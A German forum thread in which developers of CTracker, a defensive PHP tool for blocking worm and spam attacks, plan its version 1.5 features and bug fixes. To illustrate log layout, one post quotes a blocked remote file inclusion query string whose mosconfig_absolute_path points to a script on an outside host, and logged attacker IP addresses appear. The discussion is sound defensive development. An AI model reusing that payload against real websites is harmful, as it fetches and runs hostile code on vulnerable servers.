ToDo v1.5

[Nordin]

So leute ich haut in die tasten was soll verbessert und was muss geändert werden an der v1.4 ?

Was mir auf gefallen ist, auf jedenfall die aktualisierung der online Listen... mein Trafik schießt quasie nur so in die höhe *g* war ja vorauszusehen... aber is nich so wild. Ich hab dafür schon so meine idee aber wer noch nen paar gedanken dazu hat kann sie mir ruhig mitteilen.

ToDo > v1.5

• ERLEDIGT FTP-Zugang (FTP-User soll Files anlegen) vorerst nur für das update
• ERLEDIGT aktualisierung der online Listen überarbeiten (Trafik senken)
• ERLEDIGT Ordnerstrucktur überarbeiten:
  • ctracker/inc/... config, update, wormprotect,  spamfilter, functions, reset, others und so weiter
  • ctracker/logs/... nur logfiles
  • ctracker/language/...  sprachdateien
  • ctracker/admin/...  weitere files mit sonderfunktionen "nur adminzugriff" z.b. reset.php
  • ctracker/... index.php, ctracker.php, common.php
• ERLEDIGT wormprotector in require/include machen und in eine externe txt verweisen (bessere updatemöglichkeit)
• ERLEDIGT footer/copyright in require/include machen und in eine externe footer.txt verweisen (bessere updatemöglichkeit)
• ERLEDIGT phpsession mit session delay verknüpfen... automatisches ausloggen bei XX sekunden (sicherheit adminbereich)
• VERSCHOBEN auf v1.6 neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)
• VERSCHOBEN auf v1.6 sicherheitsmeldung und intrusionmessage als html ausgeben lassen
• VERSCHOBEN auf v1.6 alternative zu allow_url_fopen
• ERLEDIGT neues Layout
• ERLEDIGT auslagern der texte in language-dateien fertig
  • german
  • english
  • Jetzt brauch ich nur noch freiwilige die andere Sprachen ausser der deutschen mächtig sind und mir die Dateien übersetzen
• ERLEDIGT Dank schlumpfi erweitert sich unser Wormprotector täglich... z.Z. sind es über 380 signaturen die euch ab Version v1.5 schützen werden
• ERLEDIGT Wormprotector- und SPAM-Logfiles downloaden (zum auswerten nach angriffen)
• ERLEDIGT Whitelist für Wormprotector (ermöglicht euch signaturen einzutragen die nicht geblockt werden sollen... z.B: index.php?kill= )
• ERLEDIGT pingtimeout eingebaut... vermeidet overloads bei nicht erreichbarkeit des ctxtra-Servers
• ERLEDIGT Auswertung der Worm-Angiffe im ACP erweitert (löschen und hinzufügen der IPs, Anzeige ob IPs vom IP-Filter geblockt werden und und und)
• ERLEDIGT Installation und Update mit Sprachauswahl

behobene Bugs und kleinere Fehler:

• ERLEDIGT SPAM-Filter im ACP überarbeitet
  • Scripte ( <script> ) wird nicht mehr ausgefühert
  • Das Anzeigen der "geblockte SPAM-Einträge"-Liste funktioniert besser (jetzt auch im FF und IE7)
  • Die Uhrzeit wird richtig angezeigt (vorher wurde als Minute der Monat angezeigt )
  • email function überarbeitet
  • reset.php überarbeitet (nach dem man geblockt wurde einfach /admin/reset.php aufrufen)
• ERLEDIGT Wurm-Angriffe im ACP überarbeitet
  • Das selbe wie im SPAM-Filter die Uhrzeit wird jetzt richtig angezeigt (vorher wurde als Minute der Monat angezeigt)
• ERLEDIGT PHP ERRORS und NOTICE gesucht, gefunden und behoben...
  

VERSCHOBEN auf v1.6
addons:
... ping
... tracerout
... whois
... debug_mode[/list][/list]

[schlumpfi]

1) ordnerstruktur verbessern
...ctracker/inc/... config und update files (wormprotect, ips, spam, bots) ... ggf functions, sowie reset und others
...ctracker/logs/... nur logfiles und debug.txt
...ctracker/tpl/...  html templates
...ctracker/admin/...  weitere files mit sonderfunktionen "nur adminzugriff" ... others.php / reset.php / update.php / bots.php
...ctracker/images/.... kein kommentar 
...ctracker/ ........ nur index.php mit htaccess

2) function wormprotector ... signaturen...
...daraus ein require/include machen und in eine externe txt verweisen, die eingebunden wird... bessere updatemöglichkeit...

3) phpsession mit session delay verknüpfen... automatisches ausloggen bei XX sekunden (sicherheit adminbereich)

4)
a)erweitertes copyright, erstelle dein eigenes, füge dieses als encoded im script ein, kann keiner mehr manipulieren oder vergessen..
b) neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)
c) sicherheitsmeldung und intrusionmessage als html ausgeben lassen

5)  addons:
... ping
... tracerout
... whois

6) debug_mode


... mehr, wenn ich mal genauer hinsehe 

[Nordin]

b) neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)

wobei man jetzt schon die functionen einzeln an beliebiger stelle einbinden könnte


Super... hatten wir zwar schon in nem anderen Beitagr aber hier passt das besser her...

[schlumpfi]

b) neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)

wobei man jetzt schon die functionen einzeln an beliebiger stelle einbinden könnte
Super... hatten wir zwar schon in nem anderen Beitagr aber hier passt das besser her...

du weist das, ich weis das, aber weis das auch einer der sich nicht so mit webcoding auskennt? 

[Nordin]

aber weis das auch einer der sich nicht so mit webcoding auskennt?

*g* nö war ja auch nicht so gedacht... in der ersten version hatte ich noch nichtmal funktionen eingebaut seit der v1.3 war das dann anders und in der v1.4 hab ich dann schon alles in funktionen gesteckt. das ist quasi schon meine vorarbeit für die v1.5

Da wollte ich die alle funktionen zur verfügung stellen... ist also schon seit ende der v1.3 in planung... nur ist mir lieber nicht alles mit einmal zu machen sondern stück für stück damit die versionen nich all zu verbogen sind wenn ich sie raus gebe. (man muss auch noch dazusagen das ich erst seit einem jahr mit php progge.. bin also auch auf hilfe von ausserhalb angewiesen )

[schlumpfi]

... zum thema updates der listen und traffic..

1) updatecheck (signaturen und listen)  mit filecheck md5... UND NICHT ÜBER COUNT!
locale wird md5 geprüft... ist prüfsumme "nicht gleich" die auf dem server... downloaden... else "die"

2) userupdates und userlists...
a) diese userspezifischen signaturen in eine extra file speichern
b) user ermöglichen und fragen, update master db auf wupmedia-server?  wenn ja ... update db ... else "die"

mfg...

[schlumpfi]

=>allow_url_fopen

führen machne hoster und webspace anbieter nicht aus, da serverseitig gesperrt ist...
auch dessen support lässt diese option nicht aktivieren, hacker angriffe...
auch option mit htaccess und allow_url_fopen 1 funzt nicht, da hoster overwrite deaktiviert...
auch option übder ini_alter() funzt nicht, da diese ebenso meistens blockiert sind...

andere möglichkeit mal in betracht ziehen...

mfg

[schlumpfi]

um dir mal flux nen kleinen denkanstoss für ein schnelles bugfix zu geben, damit hier massive probleme mit chmod und url_fopen beseitigt werden können
=>> allow_url_fopen()  => fopen()

kein "$fp_borddir" bzw "$ct_borddir"
sondern
"$ct_filedir" + "$fp_filedir"


BSP
$fp_filedir = @fopen("http://".$_SERVER['HTTP_HOST']."/".$ct_filedir."/ctracker.php", "r");

NEU:
$fp_filedir = @fopen($ct_filedir."/ctracker.php", "r");

oder ggf direkt vom root ausgehen... 

mfg

[2337]

Das man bestimmte URL's erlauben kann Ohne das diese geblockt werden
z.b index.php?file=killover.rar

---------

Das unter den Anzeigen bei Angriff geblockt

1 Angriff von 195.16.251.62 am 29.06.2007 in Stunde 17, erster Angriff um 17:06:36
index?file=Test.rar

Das da die URL steht
wie ich sie jetzt hingeschrieben habe!

[schlumpfi]

Das man bestimmte URL's erlauben kann Ohne das diese geblockt werden
z.b index.php?file=killover.rar

=> eine sogenannte "whitelist" erstellen...
wenn eintrag in whitlist vorhanden... dann lasse alle ohne ausnahme zu...

Das unter den Anzeigen bei Angriff geblockt

1 Angriff von 195.16.251.62 am 29.06.2007 in Stunde 17, erster Angriff um 17:06:36
index?file=Test.rar

Das da die URL steht
wie ich sie jetzt hingeschrieben habe!

=> ansicht design und optionen der "logs auslesen" verbessern ... tabellen, string replace, string brake, usw...

mfg

[2337]

Das man bestimmte URL frei geben kann
Beispiel: index.php?file=sqltexter.rar

Würde ja geblockt werden, Ihr wisst schon was ich meine;)

----------

Das bei Angriffe geblockt!
Das man auf der seite unter den Daten auch den QUERY_STRING sehen kann, wie in den alten versionen

1 Angriff von 85.126.174.115 am 29.06.2007 in Stunde 19, erster Angriff um 19:06:07 [ mehr ]
file=index.php

[Nordin]

Das bei Angriffe geblockt!
Das man auf der seite unter den Daten auch den QUERY_STRING sehen kann, wie in den alten versionen

Ist doch?! Also der QUERY_STRING steht doch unter [ mehr ] ... Oder meinst was anderes?

[2337]

Soll aber auch auf der haupt seite stehen und nicht nur unter mehr!

[Nordin]

Hmm und was wäre der Grund das es direkt dort steht und nicht unter mehr?

Ein grund der aus meiner sicht dagegen spricht ist die länge des QUERY_STRING

So sieht ein geblockter bei mir aus:
_request=&_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path=http://securityjobs.us/xpl/tembak.txt?

Ich finde das die Seite dann zu überladen wird wenn ich es so mache. Aber wenn du mir nen gutes argument lieferst oder noch andere der meinung sind den Querystring nach vorn zu holen dann mach ich das

[schlumpfi]

Aber wenn du mir nen gutes argument lieferst oder noch andere der meinung sind den Querystring nach vorn zu holen dann mach ich das

 

absolut dagegen!!!

1.) warum soll dieser angezeigt werden, den es interesiert klickt auf "mehr" ...
je nach dem wie der string aussieht, kann er bis zu zich zeichen haben, das kann probleme bei der darstellung der logs bereiten

2.) öffentliche query strings?? wen bitte gehen query strings was an ausser den admin?


todo 1.5 .. => admin mit htacces schützen und zusätzlich sessions einbauen...

oder hab  ich da was falsch verstanden

mfg